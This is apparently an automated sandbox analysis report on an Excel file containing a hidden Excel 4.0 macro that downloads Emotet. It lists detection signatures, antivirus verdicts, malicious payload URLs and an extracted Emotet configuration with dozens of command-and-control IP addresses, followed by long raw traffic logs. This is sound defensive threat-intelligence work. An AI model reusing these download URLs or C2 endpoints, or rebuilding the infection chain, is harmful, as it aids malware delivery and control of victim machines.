Windows Analysis Report
MG72133243812OR.xls_1

Overview

General Information

Sample Name: MG72133243812OR.xls_1 (renamed file extension from xls_1 to xls)
Analysis ID: 675367
MD5: fd2b6ece7fc7767c60008e93f179814c
SHA1: 13f374087e349c54658655e65d3672c65b10c461
SHA256: f4a2380c06dcf5430f2b0ac2c321710223245b629698fb8eeda3407dca24af4f
Infos:

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: MG72133243812OR.xls Virustotal: Detection: 63% Perma Link
Source: MG72133243812OR.xls Metadefender: Detection: 40% Perma Link
Source: MG72133243812OR.xls ReversingLabs: Detection: 51%
Source: MG72133243812OR.xls Avira: detected
Source: https://www.careofu.com/PHPExcel/sQ78BedribNJZbGYj/ Avira URL Cloud: Label: malware
Source: https://172.105.226.75/= Avira URL Cloud: Label: malware
Source: https://139.162.113.169/ctiv Avira URL Cloud: Label: malware
Source: https://135.148.6.80/_: Avira URL Cloud: Label: malware
Source: https://172.105.226.75/ Avira URL Cloud: Label: malware
Source: https://fikti.bem.gunadarma.ac.id/SDM/qNeMUe2RvxdvuRlf/ Avira URL Cloud: Label: malware
Source: https://172.105.226.75:8080/ Avira URL Cloud: Label: malware
Source: https://135.148.6.80/ URL Reputation: Label: malware
Source: https://172.105.226.75/A Avira URL Cloud: Label: malware
Source: https://139.162.113.169:8080/U Avira URL Cloud: Label: malware
Source: https://139.162.113.169/f Avira URL Cloud: Label: malware
Source: https://144.91.78.55/o Avira URL Cloud: Label: malware
Source: https://139.162.113.169:8080/R Avira URL Cloud: Label: malware
Source: http://balticcontrolbd.com/cgi-bin/Gu0xno0kIssGJF8/ Avira URL Cloud: Label: malware
Source: https://172.105.226.75:8080/Z Avira URL Cloud: Label: malware
Source: cedeco.es Virustotal: Detection: 7% Perma Link
Source: balticcontrolbd.com Virustotal: Detection: 15% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\BYH56Vb[1].dll Avira: detection malicious, Label: TR/Crypt.Agent.mwmsl
Source: C:\Users\user\hhwe4.ocx Avira: detection malicious, Label: TR/Crypt.Agent.mwmsl
Source: C:\Users\user\hhwe3.ocx Avira: detection malicious, Label: TR/Crypt.Agent.mwmsl
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nQd2n6798wQuOjZR7TtNgQ[1].dll Avira: detection malicious, Label: TR/Crypt.Agent.mwmsl
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\BYH56Vb[1].dll Metadefender: Detection: 42% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\BYH56Vb[1].dll ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nQd2n6798wQuOjZR7TtNgQ[1].dll Metadefender: Detection: 42% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nQd2n6798wQuOjZR7TtNgQ[1].dll ReversingLabs: Detection: 92%
Source: C:\Users\user\hhwe3.ocx Metadefender: Detection: 42% Perma Link
Source: C:\Users\user\hhwe3.ocx ReversingLabs: Detection: 92%
Source: C:\Users\user\hhwe4.ocx Metadefender: Detection: 42% Perma Link
Source: C:\Users\user\hhwe4.ocx ReversingLabs: Detection: 88%
Source: C:\Windows\System32\HUWZaq\zHqsrrqpZcTdGFR.dll (copy) Metadefender: Detection: 42% Perma Link
Source: C:\Windows\System32\HUWZaq\zHqsrrqpZcTdGFR.dll (copy) ReversingLabs: Detection: 88%
Source: C:\Windows\System32\OajQanYCSHcPg\quNy.dll (copy) Metadefender: Detection: 42% Perma Link
Source: C:\Windows\System32\OajQanYCSHcPg\quNy.dll (copy) ReversingLabs: Detection: 92%
Source: 0000000A.00000002.1758141495.000000000021A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["139.162.113.169:8080", "135.148.6.80:443", "144.91.78.55:443", "172.105.226.75:8080", "51.161.73.194:443", "41.73.252.195:443", "82.223.21.224:8080", "172.104.251.154:8080", "201.94.166.162:443", "151.106.112.196:8080", "185.4.135.165:8080", "103.132.242.26:8080", "101.50.0.91:8080", "51.91.76.89:8080", "129.232.188.93:443", "103.43.75.120:443", "103.75.201.2:443", "82.165.152.127:8080", "196.218.30.83:443", "159.65.140.115:443", "160.16.142.56:8080", "107.170.39.149:8080", "72.15.201.15:8080", "167.172.253.162:8080", "209.97.163.214:443", "134.122.66.193:8080", "37.187.115.122:8080", "188.44.20.25:443", "45.118.115.99:8080", "207.148.79.14:8080", "183.111.227.137:8080", "159.89.202.34:443", "173.212.193.249:8080", "159.65.88.10:8080", "51.254.140.238:7080", "45.235.8.30:8080", "64.227.100.222:8080", "186.194.240.217:443", "149.56.131.28:8080", "164.68.99.3:8080", "115.68.227.76:8080", "91.207.28.33:8080", "79.137.35.198:8080", "103.70.28.102:8080", "94.23.45.86:4143", "209.126.98.206:8080", "213.241.20.155:443", "5.9.116.246:8080", "158.69.222.101:443", "163.44.196.120:8080", "206.189.28.199:8080", "1.234.2.232:8080", "45.176.232.124:443", "119.193.124.41:7080", "146.59.226.45:443", "150.95.66.124:8080", "110.232.117.186:8080", "46.55.222.11:443", "45.186.16.18:443", "212.24.98.99:8080", "153.126.146.25:7080", "197.242.150.244:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5Jxi+GMAAAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2Ihi+GMAAAIg="]}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 175.98.167.163:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown HTTPS traffic detected: 118.98.72.14:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916C310 FindFirstFileExW, 7_2_000007FEF916C310
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916C7EC FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_000007FEF916C7EC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916BB54 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_000007FEF916BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916BB54 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_000007FEF916BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FEDC FindNextFileW,FindFirstFileW, 8_2_000000018000FEDC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750BB54 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 9_2_000007FEF750BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750BB54 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 9_2_000007FEF750BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750C7EC FindFirstFileExW,FindNextFileW,FindClose,FindClose, 9_2_000007FEF750C7EC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750C310 FindFirstFileExW, 9_2_000007FEF750C310
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000FEDC FindNextFileW,FindFirstFileW, 10_2_000000018000FEDC

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: nQd2n6798wQuOjZR7TtNgQ[1].dll.0.dr Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nQd2n6798wQuOjZR7TtNgQ[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\BYH56Vb[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Source: global traffic DNS query: name: www.careofu.com
Source: global traffic DNS query: name: cedeco.es
Source: global traffic DNS query: name: balticcontrolbd.com
Source: global traffic DNS query: name: fikti.bem.gunadarma.ac.id
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 175.98.167.163:443 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 217.76.130.178:443
Source: global traffic TCP traffic: 217.76.130.178:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 217.76.130.178:443
Source: global traffic TCP traffic: 217.76.130.178:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 217.76.130.178:443 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 217.76.130.178:443
Source: global traffic TCP traffic: 217.76.130.178:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 217.76.130.178:443
Source: global traffic TCP traffic: 217.76.130.178:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 217.76.130.178:443 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 217.76.130.178:443
Source: global traffic TCP traffic: 217.76.130.178:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 217.76.130.178:443
Source: global traffic TCP traffic: 217.76.130.178:443 -> 192.168.2.22:49176
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 217.76.130.178:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80
Source: global traffic TCP traffic: 216.219.81.50:80 -> 192.168.2.22:49177
